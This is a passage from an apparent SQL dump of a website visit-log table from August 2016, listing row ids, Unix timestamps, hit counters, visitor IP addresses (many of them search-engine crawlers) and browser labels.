3','other'),(58151,1471966575,1,1,0,0,'217.69.133.169','firefox'),(58152,1471968908,1,1,0,0,'157.55.39.134','other'),(58153,1471968984,1,1,0,0,'130.193.51.19','other'),(58154,1471968986,1,1,0,0,'130.193.50.34','other'),(58155,1471969792,1,1,0,0,'37.54.19.3','firefox'),(58156,1471969994,3,3,0,0,'49.50.67.240','other'),(58157,1471970399,1,1,0,0,'212.90.62.87','chrome'),(58158,1471971848,1,1,0,0,'178.255.215.94','other'),(58159,1471972168,1,1,0,0,'95.133.238.24','chrome'),(58160,1471972189,1,1,0,0,'141.8.183.25','other'),(58161,1471974162,3,3,0,0,'130.193.50.34','other'),(58162,1471974163,1,1,0,0,'141.8.183.25','other'),(58163,1471975757,1,1,0,0,'66.249.76.81','chrome'),(58164,1471977264,2,2,0,0,'130.193.50.34','other'),(58165,1471977524,1,1,0,0,'141.0.12.106','other'),(58166,1471977650,1,1,0,0,'141.8.183.25','other'),(58167,1471979664,1,1,0,0,'130.193.50.34','other'),(58168,1471979665,1,1,0,0,'141.8.183.25','other'),(58169,1471981321,1,1,0,0,'130.193.50.34','other'),(58170,1471982231,1,0,1,0,'66.249.76.62',''),(58171,1471982437,1,0,1,0,'66.249.76.60',''),(58172,1471985025,1,1,0,0,'178.255.215.94','other'),(58173,1471985633,1,0,1,0,'66.249.76.60',''),(58174,1471985855,1,1,0,0,'5.255.253.67','other'),(58175,1471985856,1,1,0,0,'130.193.51.14','other'),(58176,1471986418,1,1,0,0,'130.193.50.4','other'),(58177,1471986423,1,1,0,0,'141.8.142.58','other'),(58178,1471989829,1,1,0,0,'66.249.66.84','chrome'),(58179,1471989869,1,1,0,0,'141.8.142.62','other'),(58180,1471989870,1,1,0,0,'141.8.183.25','other'),(58181,1471990722,1,1,0,0,'66.249.66.180','chrome'),(58182,1471990756,1,1,0,0,'180.76.15.156','other'),(58183,1471990895,1,1,0,0,'66.249.66.84','chrome'),(58184,1471991144,1,1,0,0,'66.249.76.61','chrome'),(58185,1471993816,1,1,0,0,'213.180.206.205','other'),(58186,1471995698,1,1,0,0,'130.193.50.34','other'),(58187,1471995699,3,3,0,0,'141.8.183.25','other'),(58188,1471997933,1,0,1,0,'66.249.76.77',''),(58189,1471998072,1,1,0,0,'66.249.76.79','chrome'),(58190,1471998811,1,1,0,0,'151.80.31.103','other'),(58191,1471998992,1,1,0,0,'51.255.65.6','other'),(58192,1471999112,1,0,1,0,'66.249.76.61',''),(58193,1471999798,1,1,0,0,'51.255.65.41','other'),(58194,1472000684,1,1,0,0,'164.132.161.18','other'),(58195,1472001432,2,2,0,0,'130.193.50.34','other'),(58196,1472001679,1,1,0,0,'164.132.161.71','other'),(58197,1472001703,1,1,0,0,'151.80.31.157','other'),(58198,1472001947,1,1,0,0,'164.132.161.7','other'),(58199,1472002421,1,1,0,0,'151.80.31.163','other'),(58200,1472002553,1,1,0,0,'164.132.161.11','other'),(58201,1472003318,1,1,0,0,'164.132.161.94','other'),(58202,1472003905,1,0,1,0,'66.249.76.61',''),(58203,1472004348,4,4,0,0,'51.255.194.31','other'),(58204,1472005106,1,1,0,0,'141.8.183.25','other'),(58205,1472005113,2,2,0,0,'130.193.51.19','other'),(58206,1472005428,1,1,0,0,'157.55.39.36','other'),(58207,1472006086,1,0,1,0,'66.249.76.62',''),(58208,1472006227,1,1,0,0,'51.255.65.78','other'),(58209,1472006369,1,1,0,0,'164.132.161.52','other'),(58210,1472007257,1,1,0,0,'130.193.50.38','other'),(58211,1472007258,1,1,0,0,'130.193.51.79','other'),(58212,1472007262,1,1,0,0,'130.193.51.19','other'),(58213,1472007619,1,1,0,0,'164.132.161.60','other'),(58214,1472009078,1,1,0,0,'207.46.13.118','other'),(58215,1472009895,1,1,0,0,'5.255.253.47','other'),(58216,1472009896,1,1,0,0,'130.193.50.4','other'),(58217,1472010867,1,1,0,0,'2.94.85.222','msie'),(58218,1472013072,1,1,0,0,'164.132.161.26','other'),(58219,1472013316,1,0,1,0,'66.249.76.60',''),(58220,1472014221,1,1,0,0,'37.54.19.3','firefox'),(58221,1472014264,1,0,1,0,'66.249.76.61',''),(58222,1472015277,1,1,0,0,'164.132.161.83','other'),(58223,1472015578,1,0,1,0,'66.249.76.81',''),(58224,1472015614,1,0,1,0,'66.249.76.61',''),(58225,1472015846,1,1,0,0,'130.193.50.4','other'),(58226,1472015848,1,1,0,0,'5.255.253.30','other'),(58227,1472015932,1,1,0,0,'188.32.135.141','msie'),(58228,1472016609,1,1,0,0,'37.54.19.3','firefox'),(58229,1472016830,2,2,0,0,'80.91.162.99','other'),(58230,1472017049,1,1,0,0,'164.132.161.48','other'),(58231,1472019100,1,1,0,0,'37.54.19.3','firefox'),(58232,1472019884,1,1,0,0,'66.102.9.103','chrome'),(58233,1472020671,1,1,0,0,'212.55.85.158','chrome'),(58234,1472020985,1,1,0,0,'164.132.161.44','other'),(58235,1472021189,1,1,0,0,'141.8.142.85','other'),(58236,1472024191,2,2,0,0,'207.46.13.118','other'),(58237,1472024870,1,0,1,0,'66.249.76.61',''),(58238,1472025720,1,1,0,0,'51.255.65.45','other'),(58239,1472026288,1,1,0,0,'51.255.65.88','other'),(58240,1472027009,1,1,0,0,'164.132.161.44','other'),(58241,1472027248,1,1,0,0,'164.132.161.47','other'),(58242,1472028075,1,0,1,0,'66.249.66.84',''),(58243,1472028876,1,0,1,0,'66.249.76.77',''),(58244,1472028939,1,0,1,0,'66.249.76.60',''),(58245,1472029087,1,0,1,0,'66.249.66.84',''),(58246,1472030526,1,1,0,0,'79.164.122.180','msie'),(58247,1472030830,1,1,0,0,'164.132.161.18','other'),(58248,1472031283,2,2,0,0,'149.202.54.50','other'),(58249,1472031491,1,1,0,0,'51.255.65.60','other'),(58250,1472032664,1,1,0,0,'130.193.37.7','other'),(58251,1472032668,1,1,0,0,'130.193.50.34','other'),(58252,1472033419,1,1,0,0,'141.8.142.58','other'),(58253,1472033425,1,1,0,0,'141.8.183.25','other'),(58254,1472033812,1,1,0,0,'173.208.157.186','other'),(58255,1472034298,1,1,0,0,'176.77.86.206','msie'),(58256,1472034860,1,1,0,0,'207.46.13.14','other'),(58257,1472035372,1,1,0,0,'91.196.178.72','chrome'),(58258,1472035535,1,0,1,0,'66.249.76.62',''),(58259,1472036200,1,1,0,0,'130.193.51.19','other'),(58260,1472036202,1,1,0,0,'130.193.50.34','other'),(58261,1472036247,1,0,1,0,'66.249.66.183',''),(58262,1472037465,1,1,0,0,'141.0.13.91','other'),(58263,1472037777,3,3,0,0,'83.149.126.98','other'),(58264,1472038184,1,1,0,0,'212.55.85.158','chrome'),(58265,1472038272,4,4,0,0,'88.198.16.153','other'),(58266,1472040047,1,1,0,0,'51.255.65.38','other'),(58267,1472040722,1,1,0,0,'130.193.50.34','other'),(58268,1472041678,4,4,0,0,'130.193.51.19','other'),(58269,1472041681,1,1,0,0,'141.8.142.58','other'),(58270,1472041804,2,2,0,0,'136.243.152.18','other'),(58271,1472041811,2,0,2,0,'66.249.76.62',''),(58272,1472041932,1,1,0,0,'141.8.142.67','other'),(58274,1472041946,1,1,0,0,'141.8.183.25','other'),(58275,1472042296,1,1,0,0,'130.193.50.34','other'),(58276,1472044600,1,1,0,0,'180.76.15.10','other'),(58277,1472044781,6,6,0,0,'46.4.116.197','other'),(58278,1472046994,1,1,0,0,'141.0.13.111','other'),(58279,1472047051,2,2,0,0,'130.193.51.19','other'),(58280,1472047052,2,2,0,0,'141.8.142.58','other'),(58281,1472048127,3,0,3,0,'66.249.76.61',''),(58282,1472048153,1,0,1,0,'66.249.76.81',''),(58283,1472048160,3,0,3,0,'66.249.76.60',''),(58284,1472048364,1,0,1,0,'66.249.66.81',''),(58285,1472049228,2,2,0,0,'141.8.183.25','other'),(58286,1472049355,1,1,0,0,'130.193.51.19','other'),(58287,1472049610,1,0,1,0,'66.249.66.81',''),(58288,1472049739,1,0,1,0,'66.249.66.183',''),(58289,1472050903,1,0,1,0,'66.249.66.81',''),(58290,1472051463,1,1,0,0,'51.255.65.56','other'),(58291,1472051808,1,0,1,0,'66.249.76.61',''),(58292,1472051878,2,0,2,0,'66.249.76.60',''),(58293,1472052036,2,2,0,0,'130.193.50.34','other'),(58294,1472052047,1,1,0,0,'164.132.161.52','other'),(58295,1472052442,1,0,1,0,'66.249.66.87',''),(58296,1472053150,1,1,0,0,'37.54.19.3','firefox'),(58297,1472054030,1,1,0,0,'174.129.237.157','other'),(58298,1472054348,1,1,0,0,'51.255.65.43','other'),(58299,1472055840,1,1,0,0,'91.196.178.35','chrome'),(58300,1472056144,1,1,0,0,'51.255.65.49','other'),(58301,1472056459,1,1,0,0,'164.132.161.69','other'),(58302,1472056879,1,1,0,0,'91.196.178.35','chrome'),(58303,1472056985,1,1,0,0,'164.132.161.70','other'),(58304,1472059066,3,3,0,0,'88.237.157.30','other'),(58305,1472059130,1,1,0,0,'164.132.161.96','other'),(58306,1472059169,2,2,0,0,'130.193.50.34','other'),(58307,1472059795,1,1,0,0,'91.196.178.103','chrome'),(58308,1472060415,2,2,0,0,'130.193.50.34','other'),(58309,1472061527,1,0,1,0,'66.249.76.61',''),(58310,1472061790,1,1,0,0,'94.179.15.41','chrome'),(58311,1472061820,1,1,0,0,'141.8.183.25','other'),(58312,1472061842,1,1,0,0,'157.55.39.134','other'),(58313,1472062706,1,1,0,0,'51.255.65.56','other'),(58314,1472062941,1,1,0,0,'180.76.15.29','other'),(58315,1472062972,1,0,1,0,'66.249.76.60',''),(58316,1472062993,1,0,1,0,'66.249.76.62',''),(58317,1472063663,1,1,0,0,'207.46.13.14','other'),(58318,1472064981,1,1,0,0,'178.92.8.178','chrome'),(58319,1472065561,1,1,0,0,'51.255.65.11','other'),(58320,1472065566,1,1,0,0,'66.249.76.61','chrome'),(58321,1472065651,1,1,0,0,'130.193.50.34','other'),(58322,1472065652,1,1,0,0,'141.8.183.25','other'),(58323,1472066018,1,1,0,0,'91.196.178.72','chrome'),(58324,1472067344,2,0,2,0,'66.249.76.60',''),(58325,1472067396,1,0,1,0,'66.249.76.62',''),(58326,1472067746,1,1,0,0,'51.255.65.41','other'),(58327,1472067823,2,2,0,0,'141.8.183.25','other'),(58328,1472068783,1,1,0,0,'51.255.65.42','other'),(58329,1472069086,1,0,1,0,'66.249.76.77',''),(58330,1472069090,1,0,1,0,'66.249.76.62',''),(58331,1472070576,1,0,1,0,'66.249.76.61',''),(58332,1472071435,1,1,0,0,'51.255.65.22','other'),(58333,1472071650,1,1,0,0,'207.46.13.158','other'),(58334,1472071989,3,3,0,0,'130.193.50.34','other'),(58335,1472071990,1,1,0,0,'141.8.183.25','other'),(58336,1472072026,1,1,0,0,'93.126.112.253','other'),(58337,1472072496,1,0,1,0,'66.249.64.24',''),(58338,1472073125,1,0,1,0,'66.249.64.27',''),(58339,1472073489,1,1,0,0,'213.180.206.205','other'),(58340,1472074270,1,1,0,0,'141.8.132.30','other'),(58341,1472074271,1,1,0,0,'141.8.142.25','other'),(58342,1472074278,1,1,0,0,'141.8.183.25','other'),(58343,1472074347,1,1,0,0,'164.132.161.74','other'),(58344,1472075581,1,1,0,0,'51.255.65.59','other'),(58345,1472076423,1,1,0,0,'91.196.178.129','chrome'),(58346,1472079696,4,4,0,0,'95.5.182.105','other'),(58348,1472079911,1,1,0,0,'164.132.161.62','other'),(58349,1472081116,1,1,0,0,'164.132.161.18','other'),(58350,1472083920,1,1,0,0,'164.132.161.15','other'),(58351,1472084677,4,4,0,0,'5.9.73.227','other'),(58352,1472084731,2,0,2,0,'66.249.64.74',''),(58353,1472084871,1,1,0,0,'141.8.142.58','other'),(58354,1472084874,1,1,0,0,'130.193.50.34','other'),(58355,1472085100,7,0,7,0,'66.249.64.69',''),(58356,1472085129,2,0,2,0,'66.249.64.27',''),(58357,1472085342,2,0,2,0,'66.249.64.21',''),(58358,1472086429,1,1,0,0,'66.249.64.79','chrome'),(58359,1472086451,2,1,1,0,'66.249.64.24',''),(58360,1472087165,1,1,0,0,'51.255.65.42','other'),(58361,1472087236,1,1,0,0,'130.193.50.34','other'),(58362,1472087257,1,1,0,0,'141.8.183.25','other'),(58363,1472087633,1,0,1,0,'66.249.64.24',''),(58364,1472088639,1,1,0,0,'164.132.161.26','other'),(58365,1472088722,1,1,0,0,'51.255.65.38','other'),(58366,1472090306,1,1,0,0,'164.132.161.84','other'),(58367,1472090652,1,1,0,0,'164.132.161.15','other'),(58368,1472091515,1,0,1,0,'66.249.64.27',''),(58369,1472091573,1,1,0,0,'130.193.50.34','other'),(58370,1472091575,1,1,0,0,'141.8.183.25','other'),(58371,1472092028,23,23,0,0,'69.30.234.2','other'),(58372,1472092655,1,1,0,0,'51.255.65.11','other'),(58373,1472093434,1,0,1,0,'66.249.64.24',''),(58374,1472093863,1,1,0,0,'66.249.64.79','chrome'),(58375,1472094736,1,1,0,0,'51.255.65.81','other'),(58376,1472094896,1,1,0,0,'51.255.65.44','other'),(58377,1472094903,1,1,0,0,'164.132.161.12','other'),(58378,1472095285,1,1,0,0,'5.255.253.10','other'),(58379,1472095288,1,1,0,0,'93.158.152.84','other'),(58380,1472095878,1,1,0,0,'164.132.161.88','other'),(58381,1472097138,1,1,0,0,'164.132.161.65','other'),(58382,1472097179,1,1,0,0,'51.255.65.18','other'),(58383,1472097770,1,0,1,0,'66.249.64.24',''),(58384,1472097826,1,1,0,0,'141.8.183.25','other'),(58385,1472098334,2,2,0,0,'130.193.51.19','other'),(58387,1472098661,1,1,0,0,'130.193.50.34','other'),(58388,1472098663,1,1,0,0,'141.8.142.61','other'),(58389,1472098801,1,1,0,0,'141.8.142.58','other'),(58390,1472098978,1,0,1,0,'66.249.64.79',''),(58391,1472099510,1,1,0,0,'164.132.161.58','other'),(58392,1472101346,1,1,0,0,'141.8.183.25','other'),(58393,1472101383,3,3,0,0,'130.193.50.34','other'),(58394,1472101534,1,1,0,0,'134.249.116.78','firefox'),(58395,1472101818,1,1,0,0,'180.76.15.29','other'),(58396,1472101997,1,1,0,0,'91.196.178.66','firefox'),(58397,1472102896,1,1,0,0,'91.192.200.14','firefox'),(58398,1472103265,1,1,0,0,'37.53.71.66','firefox'),(58399,1472103274,1,1,0,0,'130.193.50.34','other'),(58400,1472103887,1,1,0,0,'66.249.83.80','chrome'),(58401,1472104416,1,1,0,0,'37.54.19.3','firefox'),(58402,1472105203,1,1,0,0,'130.193.50.34','other'),(58403,1472105205,1,1,0,0,'141.8.142.67','other'),(58404,1472106050,1,1,0,0,'91.196.178.136','firefox'),(58405,1472106447,1,1,0,0,'78.111.187.122','chrome'),(58406,1472106462,1,1,0,0,'130.193.37.7','other'),(58407,1472106466,1,1,0,0,'5.255.253.10','other'),(58408,1472106781,2,2,0,0,'141.8.183.25','other'),(58409,1472106991,1,1,0,0,'178.95.246.70','firefox'),(58410,1472107174,1,1,0,0,'91.196.178.132','chrome'),(58411,1472107206,1,1,0,0,'164.132.161.41','other'),(58412,1472107486,1,1,0,0,'164.132.161.21','other'),(58413,1472107588,1,1,0,0,'109.87.170.227','chrome'),(58414,1472108106,1,1,0,0,'66.249.93.59','chrome'),(58415,1472109278,13,13,0,0,'46.4.123.172','other'),(58416,1472109759,1,1,0,0,'94.179.66.229','chrome'),(58417,1472109766,1,0,1,0,'66.249.64.21',''),(58418,1472109807,1,1,0,0,'91.196.178.72','chrome'),(58419,1472110496,1,1,0,0,'91.196.177.15','chrome'),(58420,1472111413,1,1,0,0,'164.132.161.50','other'),(58421,1472111798,2,0,2,0,'66.249.64.24',''),(58422,1472112317,1,1,0,0,'178.92.156.35','chrome'),(58423,1472112377,1,0,1,0,'66.249.64.69',''),(58424,1472112838,1,0,1,0,'66.249.64.24',''),(58425,1472113103,1,0,1,0,'66.249.64.27',''),(58426,1472113658,1,1,0,0,'164.132.161.94','other'),(58427,1472113834,1,1,0,0,'141.8.183.25','other'),(58428,1472113835,1,1,0,0,'130.193.50.34','other'),(58429,1472113836,1,1,0,0,'51.255.65.37','other'),(58430,1472114652,1,1,0,0,'178.95.246.70','firefox'),(58431,1472114916,1,0,1,0,'66.249.64.69',''),(58432,1472115498,1,1,0,0,'51.255.65.97','other'),(58433,1472115544,2,0,2,0,'66.249.64.21',''),(58434,1472115675,1,1,0,0,'178.95.246.70','firefox'),(58435,1472116599,2,2,0,0,'62.221.42.243','opera'),(58436,1472117266,1,1,0,0,'178.95.246.70','firefox'),(58437,1472117415,1,0,1,0,'66.249.64.21',''),(58438,1472117774,1,1,0,0,'94.179.66.229','chrome'),(58439,1472117845,1,1,0,0,'204.79.180.165','msie'),(58440,1472118550,1,1,0,0,'178.95.246.70','firefox'),(58441,1472118688,1,1,0,0,'94.179.66.229','chrome'),(58442,1472118814,1,1,0,0,'91.196.178.164','chrome'),(58443,1472119616,2,2,0,0,'130.193.50.34','other'),(58444,1472119902,1,0,1,0,'68.180.230.111',''),(58445,1472120029,1,1,0,0,'178.95.246.70','firefox'),(58446,1472121364,1,1,0,0,'94.179.66.229','chrome'),(58447,1472121744,1,0,1,0,'66.249.64.21',''),(58448,1472121843,2,2,0,0,'130.193.50.34','other'),(58449,1472121930,1,1,0,0,'180.76.15.148','other'),(58450,1472122148,1,1,0,0,'51.255.65.29','other'),(58451,1472123938,1,1,0,0,'91.196.178.70','firefox'),(58452,1472123940,1,1,0,0,'180.76.15.153','other'),(58453,1472124037,1,1,0,0,'51.255.65.65','other'),(58454,1472124466,1,1,0,0,'164.132.161.44','other'),(58455,1472124834,1,1,0,0,'91.196.178.71','chrome'),(58456,1472125528,1,0,1,0,'66.249.64.24',''),(58457,1472125598,1,1,0,0,'178.95.246.70','firefox'),(58458,1472126359,1,1,0,0,'91.196.178.71','firefox'),(58459,1472129694,1,1,0,0,'157.55.39.253','other'),(58460,1472129742,1,1,0,0,'178.95.246.70','firefox'),(58461,1472129757,1,1,0,0,'130.193.50.34','other'),(58462,1472129776,1,1,0,0,'141.8.183.25','other'),(58463,1472129809,1,1,0,0,'164.132.161.42','other'),(58464,1472129874,1,1,0,0,'31.128.100.166','chrome'),(58465,1472129913,1,1,0,0,'95.132.81.125','chrome'),(58466,1472130414,1,1,0,0,'91.196.178.66','firefox'),(58467,1472130485,1,1,0,0,'91.196.178.164','chrome'),(58468,1472130611,1,1,0,0,'51.255.65.67','other'),(58469,1472130714,1,1,0,0,'164.132.161.46','other'),(58470,1472130784,1,1,0,0,'176.118.42.203','chrome'),(58471,1472131080,1,1,0,0,'164.132.161.58','other'),(58472,1472131246,1,1,0,0,'164.132.161.65','other'),(58473,1472132054,1,1,0,0,'37.54.19.3','firefox'),(58474,1472132177,1,1,0,0,'91.203.26.212','chrome'),(58475,1472132420,1,1,0,0,'164.132.161.37','other'),(58476,1472132569,2,0,2,0,'66.249.64.21',''),(58477,1472132592,1,1,0,0,'141.8.183.25','other'),(58478,1472132595,1,1,0,0,'141.8.142.61','other'),(58479,1472132746,1,1,0,0,'94.179.66.229','chrome'),(58480,1472133291,1,0,1,0,'66.249.64.24',''),(58481,1472134628,1,0,1,0,'66.249.64.24',''),(58482,1472135024,1,1,0,0,'178.95.246.70','firefox'),(58483,1472135430,1,1,0,0,'164.132.161.52','other'),(58484,1472135798,1,1,0,0,'51.255.65.40','other'),(58485,1472135806,1,1,0,0,'164.132.161.21','other'),(58486,1472135879,1,1,0,0,'157.55.39.253','other'),(58487,1472135909,1,1,0,0,'51.255.65.18','other'),(58488,1472136130,2,2,0,0,'178.95.246.70','firefox'),(58489,1472136483,1,1,0,0,'164.132.161.20','other'),(58490,1472136504,1,1,0,0,'66.102.9.93','chrome'),(58491,1472136664,2,2,0,0,'141.8.183.25','other'),(58492,1472136714,1,1,0,0,'164.132.161.56','other'),(58493,1472136785,1,1,0,0,'164.132.161.34','other'),(58494,1472136801,1,1,0,0,'157.55.39.253','other'),(58495,1472138159,1,1,0,0,'91.196.178.35','chrome'),(58496,1472138831,1,1,0,0,'164.132.161.67','other'),(58497,1472138890,1,1,0,0,'164.132.161.2','other'),(58498,1472139294,1,1,0,0,'51.255.65.73','other'),(58499,1472139395,1,1,0,0,'37.54.19.3','firefox'),(58500,1472140142,1,1,0,0,'141.8.183.25','other'),(58501,1472140196,1,1,0,0,'91.196.178.72','chrome'),(58502,1472140409,1,1,0,0,'164.132.161.70','other'),(58503,1472140536,61,61,0,0,'192.166.218.214','other'),(58504,1472140563,4,4,0,0,'130.193.50.34','other'),(58505,1472140989,1,1,0,0,'51.255.65.91','other'),(58506,1472140990,1,1,0,0,'51.255.65.39','other'),(58507,1472141248,1,1,0,0,'164.132.161.14','other'),(58508,1472142149,1,1,0,0,'164.132.161.13','other'),(58509,1472142503,1,1,0,0,'80.64.92.44','chrome'),(58510,1472142534,1,1,0,0,'164.132.161.53','other'),(58511,1472142552,1,1,0,0,'93.158.152.75','other'),(58512,1472142725,1,1,0,0,'51.255.65.24','other'),(58513,1472142834,1,1,0,0,'141.8.183.25','other'),(58514,1472142835,1,1,0,0,'130.193.50.34','other'),(58515,1472143261,1,1,0,0,'164.132.161.9','other'),(58516,1472143764,1,1,0,0,'91.196.178.72','chrome'),(58517,1472144555,1,1,0,0,'164.132.161.41','other'),(58518,1472144797,1,1,0,0,'92.113.39.121','chrome'),(58519,1472144830,1,1,0,0,'51.255.65.33','other'),(58520,1472145331,1,1,0,0,'164.132.161.5','other'),(58521,1472145608,1,1,0,0,'164.132.161.50','other'),(58522,1472145703,1,1,0,0,'164.132.161.87','other'),(58523,1472146736,1,0,1,0,'66.249.64.74',''),(58524,1472146737,1,1,0,0,'195.189.50.130','firefox'),(58525,1472146965,1,0,1,0,'66.249.64.24',''),(58526,1472147414,1,1,0,0,'178.158.198.202','firefox'),(58527,1472147610,1,1,0,0,'51.255.65.17','other'),(58528,1472147720,4,4,0,0,'178.63.86.11','other'),(58529,1472147903,1,1,0,0,'164.132.161.73','other'),(58530,1472148137,1,1,0,0,'66.249.64.27','chrome'),(58531,1472148190,1,1,0,0,'82.145.221.218','other'),(58532,1472148526,1,1,0,0,'51.255.65.45','other'),(58533,1472148742,1,1,0,0,'51.255.65.75','other'),(58534,1472148928,1,1,0,0,'212.55.85.158','chrome'),(58535,1472149275,1,1,0,0,'141.8.142.58','other'),(58536,1472149277,1,1,0,0,'130.193.51.19','other'),(58537,1472149287,1,0,1,0,'66.249.64.24',''),(58538,1472149376,1,1,0,0,'164.132.161.79','other'),(58539,1472149760,1,1,0,0,'51.255.65.89','other'),(58540,1472150145,1,1,0,0,'94.179.114.152','chrome'),(58541,1472150256,1,1,0,0,'51.255.65.53','other'),(58542,1472150421,1,1,0,0,'141.8.183.25','other'),(58543,1472150423,1,1,0,0,'130.193.50.34','other'),(58544,1472150811,1,1,0,0,'51.255.65.57','other'),(58545,1472151178,1,1,0,0,'164.132.161.25','other'),(58546,1472151523,1,1,0,0,'164.132.161.32','other'),(58547,1472151680,1,1,0,0,'164.132.161.57','other'),(58548,1472151817,1,1,0,0,'157.55.39.120','other'),(58549,1472152338,1,1,0,0,'164.132.161.24','other'),(58550,1472152347,1,1,0,0,'8.37.232.234','other'),(58551,1472152445,1,1,0,0,'66.249.64.21','chrome'),(58552,1472152706,1,1,0,0,'164.132.161.26','other'),(58553,1472152755,1,1,0,0,'164.132.161.15','other'),(58554,1472153480,1,1,0,0,'95.135.168.214','chrome'),(58555,1472153753,1,1,0,0,'91.196.178.69','chrome'),(58556,1472154067,1,0,1,0,'66.249.64.24',''),(58557,1472154624,1,1,0,0,'51.255.65.2','other'),(58558,1472155108,1,1,0,0,'51.255.65.18','other'),(58559,1472155822,1,0,1,0,'66.249.64.24',''),(58560,1472156103,1,0,1,0,'66.249.64.74',''),(58561,1472156430,1,1,0,0,'51.255.65.61','other'),(58562,1472156932,1,1,0,0,'51.255.65.54','other'),(58563,1472157503,1,1,0,0,'202.46.54.24','other'),(58564,1472157951,1,1,0,0,'164.132.161.51','other'),(58565,1472158356,1,1,0,0,'51.255.65.6','other'),(58566,1472159208,1,1,0,0,'51.255.65.27','other'),(58567,1472159276,1,1,0,0,'164.132.161.58','other'),(58568,1472159517,1,1,0,0,'51.255.65.21','other'),(58569,1472160925,1,1,0,0,'51.255.65.87','other'),(58570,1472160998,2,2,0,0,'130.193.50.34','other'),(58571,1472161823,1,1,0,0,'51.255.65.75','other'),(58572,1472161842,1,1,0,0,'141.8.183.25','other'),(58573,1472161897,1,1,0,0,'164.132.161.86','other'),(58574,1472161974,1,0,1,0,'66.249.64.24',''),(58575,1472162135,1,1,0,0,'164.132.161.48','other'),(58576,1472162157,1,1,0,0,'207.46.13.14','other'),(58577,1472162173,2,0,2,0,'66.249.64.21',''),(58578,1472162211,1,1,0,0,'51.255.65.6','other'),(58579,1472162872,1,1,0,0,'51.255.65.30','other'),(58580,1472162925,1,1,0,0,'164.132.161.17','other'),(58581,1472163287,1,0,1,0,'66.249.64.69',''),(58582,1472164424,1,1,0,0,'51.255.65.38','other'),(58583,1472164798,1,1,0,0,'51.255.65.35','other'),(58584,1472165126,2,2,0,0,'130.193.50.34','other'),(58585,1472165236,1,1,0,0,'51.255.65.51','other'),(58586,1472165361,1,1,0,0,'51.255.66.124','other'),(58587,1472165364,1,1,0,0,'31.13.102.127','other'),(58588,1472165371,1,1,0,0,'51.255.65.89','other'),(58589,1472165458,1,1,0,0,'164.132.161.84','other'),(58590,1472166272,1,1,0,0,'164.132.161.82','other'),(58591,1472166765,1,0,1,0,'66.249.64.69',''),(58592,1472167402,1,1,0,0,'164.132.161.33','other'),(58593,1472167444,1,1,0,0,'51.255.65.17','other'),(58594,1472167455,1,1,0,0,'164.132.161.53','other'),(58595,1472167593,2,2,0,0,'141.8.183.25','other'),(58596,1472168420,1,1,0,0,'51.255.65.55','other'),(58597,1472169352,2,2,0,0,'69.197.163.195','other'),(58598,1472169415,1,1,0,0,'51.255.65.34','other'),(58599,1472169576,1,1,0,0,'164.132.161.7','other'),(58600,1472170035,1,1,0,0,'51.255.65.58','other'),(58601,1472170049,1,1,0,0,'51.255.65.62','other'),(58602,1472170169,1,1,0,0,'51.255.65.71','other'),(58603,1472170430,1,0,1,0,'66.249.64.79',''),(58604,1472170848,1,1,0,0,'185.26.180.63','other'),(58605,1472172205,1,1,0,0,'164.132.161.81','other'),(58606,1472172240,1,1,0,0,'164.132.161.72','other'),(58607,1472172732,2,2,0,0,'141.8.183.25','other'),(58608,1472173054,1,1,0,0,'164.132.161.58','other'),(58609,1472173599,4,4,0,0,'130.193.50.34','other'),(58610,1472173697,1,1,0,0,'164.132.161.40','other'),(58611,1472173834,6,6,0,0,'88.252.223.224','other'),(58612,1472174415,1,1,0,0,'51.255.65.54','other'),(58613,1472175629,1,1,0,0,'82.145.222.88','other'),(58614,1472176457,1,1,0,0,'51.255.65.6','other'),(58615,1472176933,1,1,0,0,'130.193.50.34','other'),(58616,1472176934,1,1,0,0,'130.193.51.19','other'),(58617,1472177202,1,1,0,0,'37.204.107.176','msie'),(58618,1472177203,1,1,0,0,'178.140.233.20','msie'),(58621,1472177205,1,1,0,0,'188.32.55.21','msie'),(58622,1472177595,1,1,0,0,'66.249.64.24','chrome'),(58623,1472177919,1,1,0,0,'164.132.161.7','other'),(58624,1472178598,1,1,0,0,'51.255.65.76','other'),(58625,1472178742,1,1,0,0,'51.255.65.58','other'),(58626,1472179071,1,1,0,0,'51.255.65.14','other'),(58627,1472179272,1,1,0,0,'164.132.161.44','other'),(58628,1472179485,1,1,0,0,'164.132.161.90','other'),(58629,1472179639,1,0,1,0,'66.249.64.21',''),(58630,1472179784,1,1,0,0,'130.193.51.19','other'),(58631,1472179809,2,2,0,0,'141.8.142.58','other'),(58632,1472179854,1,1,0,0,'51.255.65.73','other'),(58633,1472180589,1,0,1,0,'66.249.64.74',''),(58634,1472180602,1,1,0,0,'141.8.183.25','other'),(58635,1472180603,1,1,0,0,'141.8.142.67','other'),(58636,1472180776,1,1,0,0,'164.132.161.75','other'),(58637,1472181011,1,1,0,0,'164.132.161.69','other'),(58638,1472181068,2,2,0,0,'130.193.50.34','other'),(58639,1472181163,1,1,0,0,'164.132.161.34','other'),(58640,1472181623,1,1,0,0,'66.249.64.21','chrome'),(58641,1472181940,1,1,0,0,'164.132.161.85','other'),(58642,1472182075,1,1,0,0,'51.255.65.69','other'),(58643,1472182606,1,1,0,0,'164.132.161.63','other'),(58644,1472182906,1,1,0,0,'51.255.65.57','other'),(58645,1472183452,1,1,0,0,'51.255.65.41','other'),(58646,1472183871,1,1,0,0,'164.132.161.62','other'),(58647,1472184022,1,1,0,0,'51.255.65.69','other'),(58648,1472184053,1,1,0,0,'207.46.13.14','other'),(58649,1472184473,1,1,0,0,'130.193.50.34','other'),(58650,1472184478,1,1,0,0,'141.8.142.58','other'),(58651,1472184504,1,1,0,0,'51.255.65.7','other'),(58652,1472184640,1,1,0,0,'164.132.161.72','other'),(58653,1472184756,1,1,0,0,'164.132.161.36','other'),(58654,1472184881,1,1,0,0,'51.255.65.75','other'),(58655,1472185624,1,0,1,0,'66.249.64.24',''),(58656,1472186320,1,1,0,0,'130.193.50.34','other'),(58657,1472186322,1,1,0,0,'130.193.51.19','other'),(58658,1472187376,1,1,0,0,'164.132.161.42','other'),(58659,1472187737,1,1,0,0,'164.132.161.35','other'),(58660,1472187842,1,1,0,0,'130.193.50.34','other'),(58661,1472187843,1,1,0,0,'141.8.183.25','other'),(58662,1472187844,1,1,0,0,'164.132.161.67','other'),(58663,1472189089,1,1,0,0,'164.132.161.64','other'),(58664,1472189630,1,1,0,0,'164.132.161.86','other'),(58665,1472189646,1,0,1,0,'66.249.64.69',''),(58666,1472190364,1,1,0,0,'91.196.178.72','firefox'),(58667,1472190407,1,1,0,0,'66.249.64.21','chrome'),(58668,1472190431,1,1,0,0,'51.255.65.41','other'),(58669,1472190931,1,1,